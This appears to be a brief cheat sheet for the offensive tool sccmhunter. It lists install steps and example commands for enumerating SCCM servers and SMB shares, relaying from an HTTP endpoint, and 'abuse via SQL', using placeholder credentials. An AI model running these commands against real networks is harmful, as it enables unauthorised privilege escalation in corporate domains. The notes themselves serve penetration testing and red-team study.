#
sccmhunter.py
A rad tool for hunting SCCM!
#
Install
git clone https://github.com/garrettfoster13/sccmhunter.git
cd sccmhunter
virtualenv --python=python3 .
source bin/activate
pip3 install -r requirements.txt
python3 sccmhunter.py -h
#
Enumerate SCCM config, enumerate remote hosts SMB shares, signing status, and SQL service status
sccmhunter.py find -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5
#
Enumerate SMB shares
The instructions say this "profiles and enumerates SMB shares of discovered SCCM servers, where as the find command "Enumerates LDAP and SCCM assets." I believe it does an SMB-level dive into shares looking for PXEBoot variables files.
sccmhunter.py smb -u lowpriv -p pass -d domain.com -dc-ip 1.2.3.4
#
Enumerate user accounts associated with SCCM
python3 sccmhunter.py show -users
#
View all the enumeration info you have after doing the "find" command
sccmhunter.py show -all
#
Relay from an HTTP endpoint
sccmhunter.py http -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5 -ldaps -auto
#
Abuse via SQL
sccmhunter.py mssql -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5 -tu lowpriv -sc SITECODE